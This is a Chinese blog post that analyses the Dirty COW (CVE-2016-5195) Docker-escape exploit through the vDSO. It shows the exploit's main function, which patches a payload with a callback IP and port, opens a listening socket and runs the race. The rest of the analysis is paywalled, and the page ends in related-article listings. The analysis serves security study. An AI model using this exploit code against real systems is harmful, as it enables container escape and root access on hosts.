脏牛漏洞-Docker逃逸POC(dirtycow-vdso)代码分析

最新推荐文章于 2024-08-15 17:56:23 发布
最新推荐文章于 2024-08-15 17:56:23 发布
阅读量7.4k 收藏 4
点赞数 2
分类专栏: Linux本地提权漏洞 文章标签: 脏牛漏洞 Docker逃逸
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/enjoy5512/article/details/53196047
版权
本文详细介绍了脏牛漏洞(CVE-2016-5195)如何导致Docker逃逸,解析了利用代码的运行流程和关键函数,包括htonl/htons函数转换、parse_ip_port的IP与端口解析、get_vdso_addr获取vDSO地址、fingerprint_prologue指纹识别、patch_payload与build_vdso_patch的payload构建与注入、create_socket的监听设置以及exploit利用过程。最后,文章阐述了exploit后的恢复操作和yeah函数的连接处理。
摘要由CSDN通过智能技术生成

利用代码原出处
代码原帖

本人GitHub也保留有漏洞利用相关代码
CVE-2016-5195

作者 : 武汉大学Docker安全研究小组

一 . 代码运行流程


Main函数 

int main(int argc, char *argv[])
{
    struct prologue *prologue;
    struct mem_arg arg;
    uint16_t port;
    uint32_t ip;
    int s;

    ip = htonl(PAYLOAD_IP);
    port = htons(PAYLOAD_PORT);

    if (argc > 1) {
        if (parse_ip_port(argv[1], &ip, &port) != 0)
            return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] payload target: %s:%d\n",
        inet_ntoa(*(struct in_addr *)&ip), ntohs(port));

    arg.vdso_addr = get_vdso_addr();
    if (arg.vdso_addr == NULL)
        return EXIT_FAILURE;

    prologue = fingerprint_prologue(arg.vdso_addr);
    if (prologue == NULL) {
        fprintf(stderr, "[-] this vDSO version isn't supported\n");
        fprintf(stderr, "    add first entry point instructions to prologues\n");
        return EXIT_FAILURE;
    }

    if (patch_payload(prologue, ip, port) == -1)
        return EXIT_FAILURE;

    if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
        return EXIT_FAILURE;

    s = create_socket(port);
    if (s == -1)
        return EXIT_FAILURE;

    if (exploit(&arg, true) == -1) {
        fprintf(stderr, "exploit failed\n");
        return EXIT_FAILURE;
    }

    yeah(&arg, s);

    return EXIT_SUCCESS;
}
Created with Raphaël 2.1.0 开始 htonl()/htons() IP转换
最低0.47元/天 解锁文章
enjoy5512
关注
专栏目录
Docker逃逸--脏牛漏洞POC测试
07-25 1115
脏牛漏洞(CVE-2016-5195)与VDSO(虚拟动态共享对象) 一、漏洞描述 Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。 竞争条件意为任务执行顺序异常,可能导致应...
Dirtycow脏牛(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 567
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
探索脏牛(Dirty COW)的奇妙之旅:在Docker容器内的vdso实战
gitblog_00033的博客
06-16 291
探索脏牛(Dirty COW)的奇妙之旅:在Docker容器内的vdso实战 项目地址:https://gitcode.com/gebl/dirtycow-docker-vdso 项目介绍 脏牛漏洞(Dirty COW,CVE-2016-5195)是Linux内核历史上的一个著名安全漏洞,自其曝光以来,就成为了安全研究者和系统管理员关注的焦点。而dirtycow-docker-vdso这个项目,...
docker逃逸方法汇总与简要分析
2401_84466336的博客
08-07 1079
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,它允许用户通过RESTful API与Docker引擎进行交互,这意味着开发人员可以使用HTTP请求来远程管理和控制Docker引擎,包括创建、启动、停止和删除容器,构建和管理镜像,以及执行其他与Docker相关的操作。
Docker容器逃逸
最新发布
m0_74402888的博客
08-15 848
最简单精准的方式就是查询系统进程的cgroup信息,通过响应的内容可以识别当前进程所处的运行环境,就可以知道是在虚拟机、docker还是kubepods里。一个容器技术,类似于VM虚拟机,别人环境封装好打包成一个镜像,使用docker技术就能快速把这个镜像环境还原出来。通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境。攻击者攻击虚拟空间磁盘,拿到最高权限也是虚拟空间的权限,而不是真实物理环境的权限。在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部。
Docker Dirty Cow逃逸
weixin_33966365的博客
10-29 390
2019独角兽企业重金招聘Python工程师标准>>> ...
技术干货 | Docker 容器逃逸案例汇集
热门推荐
08-02 2万+
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。 假设,我们获取的Webshell就处于Docker容器里,那么,我们该如何破局呢? Docker 容器逃逸案例: 1、判断是否处于docker容器里 2、配置不当引起的逃逸 Docker Remote API 未授权访问 docker.s...
运维知识点-Docker从小白到入土
aming小老弟
11-04 500
获取某个系统shell后发现其是docker这时候我们就需要进行docker逃逸来拿到其真正宿主的权限。
Docker 容器逃逸案例分析
yunqishequ1的博客
07-20 5083
摘要: ## 0. 前言 本文参考自《Docker 容器与容器云》 这个容器逃逸的 case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了,这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析PoC 源码地址:[shocker.c](https://github.com/gabrtv/shocker/b 0.
Docker逃逸原理
11-06
Docker有6大Namespace,PPT中分析了6个Namespace的基本原理和最终逃逸原理
关于Docker逃逸
qq_50854662的博客
04-27 722
关于Docker逃逸
DockerDocker逃逸小结
woodwhale的博客
03-28 1827
docker逃逸小结
生命在于学习——docker逃逸
易水哲的博客
12-02 4855
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5574
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具
gitblog_00092的博客
04-18 256
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具 dirtycow-vdsoPoC for Dirty COW (CVE-2016-5195)项目地址:https://gitcode.com/gh_mirrors/di/dirtycow-vdso 在网络安全领域,了解和研究漏洞是至关重要的工作。Dirty COW(亦称为 CVE-2016-5195)是一个著名的Linux...
2016年最火最牛的内存漏洞分析-dirtycow
奔跑吧-Linux内核
10-29 2952
2016年10月发现一个存在了将近有十年之久的非常严重的安全漏洞,该漏洞可以让低权限的用户利用内存写时复制机制的缺陷来提升自己的系统权限,从而获取root权限,这样黑客可以利用该漏洞入侵服务器,现在大部分的服务器都跑着linux系统。这个漏洞被称为Dirty COW,代号为CVE-2016-5195。Linux内核社区在10月18日紧急修复了这个历史久远的bug,各大发型版Linux发布紧急更新公
- docker images: - docker rmi - docker pull - docker push - docker save - docker load
02-23
Docker images是Docker中的一个重要概念它是用于创建Docker容器的基础。一个Dock image是一个只读的模板,包含了运行一个容器所需的所有文件系统、代码和依赖项。 下是对于您提到的几个D命令的介绍1. docker rmi:该命令用于删除一个或多个Docker镜像。可以通过镜像ID或者镜像名称来指定要删除的像。 2. docker pull:该命令于从Docker仓库中拉取(下载)一个Docker镜像到本地。可以通过指定镜像名称和标签来拉取特定版本的镜像。 3. docker push:该命令用于将本地的Docker镜像推送(上传)到Docker仓库中,以便其他人可以从仓库中拉取使用。需要先登录到Docker仓库才能进行推送操作。 4. docker save:该命令用于将一个或多个Docker镜像保存为一个tar文件。这个tar文件可以用于在其他机器上使用docker load命令加载这些镜像。 5. docker load:该命令用于从一个tar文件中加载(导入)一个或多个Docker镜像到本地。这些镜像可以是通过docker save命令保存的。 希望以上解答对您有帮助!
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值